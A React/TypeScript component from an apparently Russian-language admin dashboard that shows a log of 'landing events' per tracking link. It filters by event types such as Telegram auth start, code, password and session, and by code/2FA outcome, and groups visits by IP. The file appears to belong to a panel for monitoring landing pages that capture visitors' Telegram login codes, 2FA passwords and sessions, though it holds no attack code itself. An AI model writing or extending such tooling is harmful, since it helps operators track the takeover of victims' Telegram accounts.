import { fetchLandingEvents, fetchLandingEventVisits } from '@/api/landings';
import { Card, CardContent } from '@/components/ui/card';
import { Label } from '@/components/ui/label';
import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from '@/components/ui/select';
import { Spinner } from '@/components/ui/spinner';
import type { StatsPeriod } from '@/entities/admin-stats.entity';
import type { ILandingEvent, ILandingEventAggregates, ILandingEventVisit, LandingEventType } from '@/entities/landing.entity';
import { LANDING_EVENT_TYPE_LABELS } from '@/entities/landing.entity';
import { periodToRange } from '@/lib/stats-period';
import { cn } from '@/lib/utils';
import { useCallback, useEffect, useRef, useState } from 'react';
import LandingEventRow from './landing-event-row';
import LandingEventVisitCard from './landing-event-visit-card';
import LandingEventsAggregatesBar from './landing-events-aggregates-bar';

const EVENT_TYPES: Array<LandingEventType | 'all'> = [
	'all',
	'connect',
	'download',
	'form_submit',
	'telegram_auth_start',
	'telegram_auth_code',
	'telegram_auth_password',
	'telegram_auth_session',
];

type LogViewMode = 'list' | 'visits';
type OutcomeFilter = 'all' | 'success' | 'error';

interface LandingEventsLogTabProps {
	period: StatsPeriod;
	linkId: string;
}

export default function LandingEventsLogTab({ period, linkId }: LandingEventsLogTabProps) {
	const [viewMode, setViewMode] = useState<LogViewMode>('list');
	const [events, setEvents] = useState<ILandingEvent[]>([]);
	const [visits, setVisits] = useState<ILandingEventVisit[]>([]);
	const [aggregates, setAggregates] = useState<ILandingEventAggregates | undefined>();
	const [loading, setLoading] = useState(true);
	const [loadingMore, setLoadingMore] = useState(false);
	const [nextCursor, setNextCursor] = useState<string | null>(null);
	const [typeFilter, setTypeFilter] = useState<string>('all');
	const [telegramOnly, setTelegramOnly] = useState(false);
	const [outcomeFilter, setOutcomeFilter] = useState<OutcomeFilter>('all');

	const sentinelRef = useRef<HTMLDivElement>(null);
	const fetchingRef = useRef(false);
	const nextCursorRef = useRef<string | null>(null);

	const buildRangeParams = useCallback(() => {
		const range = periodToRange(period);
		return {
			linkId: linkId || undefined,
			from: range.from ?? undefined,
			to: range.to,
		};
	}, [linkId, period]);

	const buildListParams = useCallback(() => {
		const params: {
			linkId?: string;
			type?: LandingEventType;
			outcome?: 'success' | 'error';
			telegramOnly?: boolean;
			from?: string;
			to?: string;
		} = { ...buildRangeParams() };
		if (typeFilter !== 'all') params.type = typeFilter as LandingEventType;
		if (telegramOnly) params.telegramOnly = true;
		if (outcomeFilter !== 'all') params.outcome = outcomeFilter;
		return params;
	}, [buildRangeParams, typeFilter, telegramOnly, outcomeFilter]);

	const loadList = useCallback(
		async (reset = true) => {
			if (fetchingRef.current) return;
			fetchingRef.current = true;
			if (reset) setLoading(true);
			else setLoadingMore(true);

			try {
				const data = await fetchLandingEvents({
					...buildListParams(),
					limit: 50,
					cursor: reset ? undefined : (nextCursorRef.current ?? undefined),
				});
				setEvents(prev => (reset ? data.items : [...prev, ...data.items]));
				if (reset && data.aggregates) {
					setAggregates(data.aggregates);
				}
				nextCursorRef.current = data.nextCursor;
				setNextCursor(data.nextCursor);
			} finally {
				fetchingRef.current = false;
				setLoading(false);
				setLoadingMore(false);
			}
		},
		[buildListParams],
	);

	const loadVisits = useCallback(
		async (reset = true) => {
			if (fetchingRef.current) return;
			fetchingRef.current = true;
			if (reset) setLoading(true);
			else setLoadingMore(true);

			try {
				const data = await fetchLandingEventVisits({
					...buildRangeParams(),
					telegramOnly: true,
					limit: 20,
					cursor: reset ? undefined : (nextCursorRef.current ?? undefined),
				});
				setVisits(prev => (reset ? data.items : [...prev, ...data.items]));
				nextCursorRef.current = data.nextCursor;
				setNextCursor(data.nextCursor);
			} finally {
				fetchingRef.current = false;
				setLoading(false);
				setLoadingMore(false);
			}
		},
		[buildRangeParams],
	);

	useEffect(() => {
		nextCursorRef.current = null;
		setNextCursor(null);
		if (viewMode === 'list') {
			void loadList(true);
		} else {
			void loadVisits(true);
		}
	}, [viewMode, loadList, loadVisits]);

	useEffect(() => {
		const el = sentinelRef.current;
		if (!el || !nextCursor) return;

		const observer = new IntersectionObserver(entries => {
			if (entries[0]?.isIntersecting) {
				if (viewMode === 'list') void loadList(false);
				else void loadVisits(false);
			}
		});
		observer.observe(el);
		return () => observer.disconnect();
	}, [viewMode, loadList, loadVisits, nextCursor]);

	return (
		<div className='flex flex-col gap-3'>
			<Card className='gap-0 py-0 shadow-sm overflow-hidden'>
				<CardContent className='px-4 py-4 flex flex-col gap-3'>
					<div className='flex gap-1.5' role='tablist' aria-label='Режим лога'>
						{(['list', 'visits'] as LogViewMode[]).map(mode => (
							<button
								key={mode}
								type='button'
								role='tab'
								aria-selected={viewMode === mode}
								onClick={() => setViewMode(mode)}
								className={cn(
									'flex-1 h-8 rounded-md border text-xs font-medium transition-colors',
									viewMode === mode
										? 'bg-secondary border-border text-foreground'
										: 'border-border/60 text-muted-foreground hover:bg-accent',
								)}
							>
								{mode === 'list' ? 'Список' : 'По визитам'}
							</button>
						))}
					</div>

					{viewMode === 'list' ? (
						<>
							<div className='flex flex-col gap-1.5'>
								<Label>Тип</Label>
								<Select value={typeFilter} onValueChange={setTypeFilter}>
									<SelectTrigger>
										<SelectValue />
									</SelectTrigger>
									<SelectContent>
										{EVENT_TYPES.map(t => (
											<SelectItem key={t} value={t}>
												{t === 'all' ? 'Все' : LANDING_EVENT_TYPE_LABELS[t]}
											</SelectItem>
										))}
									</SelectContent>
								</Select>
							</div>
							<div className='flex flex-wrap gap-2'>
								<button
									type='button'
									className={cn(
										'h-8 px-3 rounded-md border text-xs',
										telegramOnly ? 'bg-chart-4/15 border-chart-4/40 text-chart-4' : 'border-border text-muted-foreground',
									)}
									onClick={() => setTelegramOnly(prev => !prev)}
								>
									Только TG
								</button>
							</div>
							<div className='flex flex-col gap-1.5'>
								<Label>Исход (код / 2FA)</Label>
								<Select value={outcomeFilter} onValueChange={v => setOutcomeFilter(v as OutcomeFilter)}>
									<SelectTrigger>
										<SelectValue />
									</SelectTrigger>
									<SelectContent>
										<SelectItem value='all'>Все</SelectItem>
										<SelectItem value='success'>Успех</SelectItem>
										<SelectItem value='error'>Ошибка</SelectItem>
									</SelectContent>
								</Select>
							</div>
						</>
					) : (
						<p className='text-xs text-muted-foreground'>Визиты: link + IP, разрыв более 30 мин. Показаны TG-события.</p>
					)}

					{viewMode === 'list' ? <LandingEventsAggregatesBar aggregates={aggregates} /> : null}
				</CardContent>
			</Card>

			<Card className='gap-0 py-0 shadow-sm overflow-hidden'>
				<CardContent className='px-4 py-4'>
					{loading ? (
						<div className='flex justify-center py-8'>
							<Spinner />
						</div>
					) : viewMode === 'list' ? (
						events.length === 0 ? (
							<p className='text-sm text-muted-foreground text-center py-8'>Событий нет</p>
						) : (
							<div className='flex flex-col gap-2'>
								{events.map(event => (
									<LandingEventRow key={event.id} event={event} />
								))}
							</div>
						)
					) : visits.length === 0 ? (
						<p className='text-sm text-muted-foreground text-center py-8'>Визитов нет</p>
					) : (
						<div className='flex flex-col gap-2'>
							{visits.map(visit => (
								<LandingEventVisitCard
									key={`${visit.linkId}:${visit.ip}:${visit.startedAt}`}
									visit={visit}
								/>
							))}
						</div>
					)}
					{loadingMore ? (
						<div className='flex justify-center py-4'>
							<Spinner />
						</div>
					) : null}
					<div ref={sentinelRef} className='h-1' />
				</CardContent>
			</Card>
		</div>
	);
}
